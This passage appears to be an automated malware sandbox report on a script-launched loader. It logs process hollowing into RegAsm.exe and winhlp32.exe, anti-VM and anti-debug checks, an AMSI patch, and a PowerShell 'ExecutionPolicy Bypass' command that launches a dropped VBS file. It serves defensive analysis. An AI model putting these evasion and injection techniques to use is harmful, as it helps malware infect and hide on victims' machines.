        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D20000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F80000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D90000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1330000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2FF0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4FF0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1450000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 32A0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2FB0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1480000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2CD0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B00000 memory reserve | memory write watch
        Source: C:\Windows\winhlp32.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A748
        Source: C:\Windows\winhlp32.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_0041A748
        Source: C:\Windows\winhlp32.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,21_2_0041A748
        Source: C:\Windows\winhlp32.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,23_2_0041A748
        Source: C:\Windows\winhlp32.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,27_2_0041A748
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2852
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7003
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3445
        Source: C:\Windows\winhlp32.exe	Window / User API: threadDelayed 6473
        Source: C:\Windows\winhlp32.exe	Window / User API: threadDelayed 3519
        Source: C:\Windows\SysWOW64\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dynwrapx.dll
        Source: C:\Windows\winhlp32.exe	API coverage: 6.2 %
        Source: C:\Windows\winhlp32.exe	API coverage: 6.0 %
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3504	Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3448	Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4112	Thread sleep count: 2852 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4112	Thread sleep count: 7003 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6132	Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6600	Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3140	Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108	Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\winhlp32.exe TID: 2072	Thread sleep count: 6473 > 30
        Source: C:\Windows\winhlp32.exe TID: 2072	Thread sleep time: -19419000s >= -30000s
        Source: C:\Windows\winhlp32.exe TID: 2072	Thread sleep count: 3519 > 30
        Source: C:\Windows\winhlp32.exe TID: 2072	Thread sleep time: -10557000s >= -30000s
        Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_COMPUTERSYSTEM
        Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exe	File Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
        Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs FullSizeInformation
        Source: C:\Windows\SysWOW64\wscript.exe	File Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs FullSizeInformation
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData
        Source: RegAsm.exe, 00000004.00000002.3316798522.0000000005337000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, winhlp32.exe, 00000011.00000003.2300656091.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: winhlp32.exe, 00000011.00000003.2300656091.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWf
        Source: RegAsm.exe, 00000004.00000002.3316213754.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: RegAsm.exe, 00000004.00000002.3307841453.0000000001150000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
        Source: C:\Windows\winhlp32.exe | API call chain: ExitProcess graph end node (graph_17-48922)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_004432B5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_004432B5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_004432B5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_004432B5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00412077 GetProcessHeap,HeapFree
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00434B47 SetUnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00434B47 SetUnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00434B47 SetUnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00434B47 SetUnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00434B47 SetUnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, AntiProcess.cs | Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Win32.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Win32.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Amsi.cs | Reference to suspicious API methods: Win32.VirtualAllocEx(procAddress, (UIntPtr)(ulong)patch.Length, 64u, out var _)
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\wscript.exe | Code function: 2_2_05660054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C37008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: ECA008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10BC008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C33008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
